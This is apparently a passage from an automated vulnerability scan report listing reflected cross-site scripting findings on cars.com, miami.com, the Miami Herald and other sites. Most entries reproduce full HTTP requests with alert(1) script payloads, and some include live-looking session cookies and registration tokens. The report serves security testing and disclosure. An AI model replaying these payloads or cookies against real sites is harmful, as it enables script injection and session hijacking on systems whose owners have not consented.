GET /go/advice/Section.jsp?channel=advice&section=buye4373<script>alert(1)</script>19d07abf959&aff=herald HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
<H1>Error page exception</H1> <H4>The server cannot use the error page specified for your application to handle the Original Exception printed below. Please see the Error Page Exception below for a d ...[SNIP]... </B>/advice/includes/_xSectionIndex_buye4373<script>alert(1)</script>19d07abf959.jsp<BR> ...[SNIP]...
The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6a7"><a%20b%3dc>9b378c5b51d was submitted in the subject parameter. This input was echoed as ec6a7"><a b=c>9b378c5b51d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /go/advice/Story.jsp?section=fuel&subject=fuelListec6a7"><a%20b%3dc>9b378c5b51d&story=mpgClass&aff=herald HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
The value of the subject request parameter is copied into the HTML document as plain text between tags. The payload 1f8c3<a>11eb73411e3 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /go/advice/Story.jsp?section=buy&subject=1f8c3<a>11eb73411e3&story=classResidual HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
2.209. http://www.cars.com/go/car-dealers/ck/Miami-FL/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cars.com
Path: /go/car-dealers/ck/Miami-FL/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbc6"><script>alert(1)</script>db9daeb9116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/car-dealers/ck/Miami-FL/?8cbc6"><script>alert(1)</script>db9daeb9116=1 HTTP/1.1 Host: www.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cars_persist=3896579244.20480.0000;
The value of the story request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9a2"><a%20b%3dc>39b26a2aac5 was submitted in the story parameter. This input was echoed as dd9a2"><a b=c>39b26a2aac5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011dd9a2"><a%20b%3dc>39b26a2aac5&subject=stories&year=New HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177f8"><script>alert(1)</script>c46c53badf5 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/crp/buyingGuides/Story.jsp?section=Sports&story=sportHot2011&subject=stories177f8"><script>alert(1)</script>c46c53badf5&year=New HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
The value of the specialsURL request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//f5fd4a94 was submitted in the specialsURL parameter. This input was echoed as javascript:alert(1)//f5fd4a94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /go/dealersearch/specials.jsp?specialsURL=javascript%3aalert(1)//f5fd4a94&apn=herald&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cars_persist=3896579244.20480.0000;
The value of the makename request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a186d"><script>alert(1)</script>13aeb39e616 was submitted in the makename parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the modelname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b61"><script>alert(1)</script>d4b3fa8bb16 was submitted in the modelname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the my request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d0dd"><script>alert(1)</script>f402f124952 was submitted in the my parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f72c'%3balert(1)//6eca97bbb21 was submitted in the version parameter. This input was echoed as 9f72c';alert(1)//6eca97bbb21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reg-bin/int.cgi?mode=login&version=esp9f72c'%3balert(1)//6eca97bbb21 HTTP/1.1
Host: www.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Mi-app-host: rdds008p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:39:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77533
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765c4'%3balert(1)//a86bf71eac9 was submitted in the version parameter. This input was echoed as 765c4';alert(1)//a86bf71eac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reg-bin/tint.cgi?mode=edit&version=newsletter765c4'%3balert(1)//a86bf71eac9 HTTP/1.1
Host: www.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds017p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:39:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:39:36 GMT
Content-Length: 32389
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
2.218. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mathias-bank.de
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ba8"><script>alert(1)</script>9a5bd6d02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ba8\"><script>alert(1)</script>9a5bd6d02c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?91ba8"><script>alert(1)</script>9a5bd6d02c1=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:40:39 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1289774439+174.121.222.18; path=/
Set-Cookie: PHPSESSID=0f3d95ccecf9bde143451862e81a94c4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="/?91ba8\"><script>alert(1)</script>9a5bd6d02c1=1/lang-pref/en/"> ...[SNIP]...
2.219. http://www.miami.com/advanced-search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /advanced-search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0f3"-alert(1)-"6571febded2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced-search?6b0f3"-alert(1)-"6571febded2=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.220. http://www.miami.com/deals [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /deals
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3581b"-alert(1)-"133c343be5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals?3581b"-alert(1)-"133c343be5e=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:23 GMT
Content-Length: 22144
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.221. http://www.miami.com/espanol [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /espanol
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2adf"-alert(1)-"b1a172c4bed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /espanol?f2adf"-alert(1)-"b1a172c4bed=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:47 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71598
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.222. http://www.miami.com/galleries [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /galleries
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d478"-alert(1)-"52928c4d4d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /galleries?9d478"-alert(1)-"52928c4d4d7=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.223. http://www.miami.com/gay [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /gay
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af6fa"-alert(1)-"6c3dea84605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gay?af6fa"-alert(1)-"6c3dea84605=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:26 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:43:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:43:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 72751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.224. http://www.miami.com/hotels [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /hotels
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d989"-alert(1)-"1c56ab040ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotels?4d989"-alert(1)-"1c56ab040ce=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 95134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.225. http://www.miami.com/movies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6eb"-alert(1)-"029fda865f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /movies?6c6eb"-alert(1)-"029fda865f4=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:30 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.226. http://www.miami.com/movies/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /movies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892e0"-alert(1)-"96ce8fc124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /movies/?892e0"-alert(1)-"96ce8fc124=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:54:06 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:54:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.227. http://www.miami.com/nightlife [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /nightlife
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6577"-alert(1)-"5b0a69b1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nightlife?b6577"-alert(1)-"5b0a69b1321=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 73883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.228. http://www.miami.com/restaurants [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4407a"-alert(1)-"6f919770c59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /restaurants?4407a"-alert(1)-"6f919770c59=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.229. http://www.miami.com/see-do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /see-do
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9e5"-alert(1)-"44afdd7ab8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /see-do?7f9e5"-alert(1)-"44afdd7ab8e=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:43:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71616
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.230. http://www.miami.com/shopping [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.miami.com
Path: /shopping
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c96d"-alert(1)-"25b0154ec80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shopping?7c96d"-alert(1)-"25b0154ec80=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b7'%3balert(1)//6fc0ef752d5 was submitted in the version parameter. This input was echoed as 1f1b7';alert(1)//6fc0ef752d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reg-bin/tint.cgi?mode=edit&version=newsletter1f1b7'%3balert(1)//6fc0ef752d5 HTTP/1.1
Host: www.miamiherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mi__classads_featured=o7p1289710800;
Response
HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds008p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:53:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:53:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41352
